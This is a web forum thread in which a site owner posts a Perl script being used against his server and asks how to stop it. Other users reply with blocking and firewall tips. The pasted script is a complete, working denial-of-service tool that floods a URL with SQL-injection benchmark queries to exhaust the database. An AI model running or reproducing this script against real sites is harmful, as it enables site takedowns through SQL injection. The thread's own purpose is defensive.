Hello A user is using this perl script to attack me? use LWP::UserAgent; my $nave = LWP::UserAgent->new; $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"); $nave->timeout(5); head(); if($ARGV[0]) { now($ARGV[0]); } else { sintax(); } copyright(); sub now { print "\n[+] Target : ".$_[0]."\n"; print "\n[+] Starting the attack\n[+] Info : control+c for stop attack\n\n"; while(true) { $SIG{INT} = \&adios; $code = toma($_[0]." and (select+benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f))"); unless($code->is_success) { print "[+] Web Off\n"; copyright(); }}} sub adios { print "\n[+] Stoping attack\n"; copyright(); } sub head { print "\n\n-- == #RefRef == --\n\n"; } sub copyright { print "\n\n-- == RefRef == --\n\n"; exit(1); } sub sintax { print "\n[+] Sintax : $0 \n"; } sub toma { return $nave->get($_[0]); } # ¿ The End ? Code (markup): Any ideas how to stop this? It is attacking to url like: http://www.xxx.xxx/xxx.php?xxx=xxx Code (markup): I am using cloudflare and nginx on my server plus csf firewall... Thank you
Blocking the IP in your CloudFlare threat control panel should help (some other quick tips for dealing with a DDoS attack). Since you're using nginx as your server, however, you would want to make sure that you do this for CloudFlare and nginx.
you better use this : Prevent DOS attacks : http://www.meziamus.net/topic/17-prevent-dos-attack-by-csf-firewall/
The question is why he will DDoS your site(s)? Instead, block off all I.Ps or temporary put server down to maintenance mode. If you're generating big bucks with this website, it's advisable to invest in hardware firewalls and use it as a medium - more troublesome but worth it.. Steer clear of services offering anti-DDoS attacks. All The Best, Commoner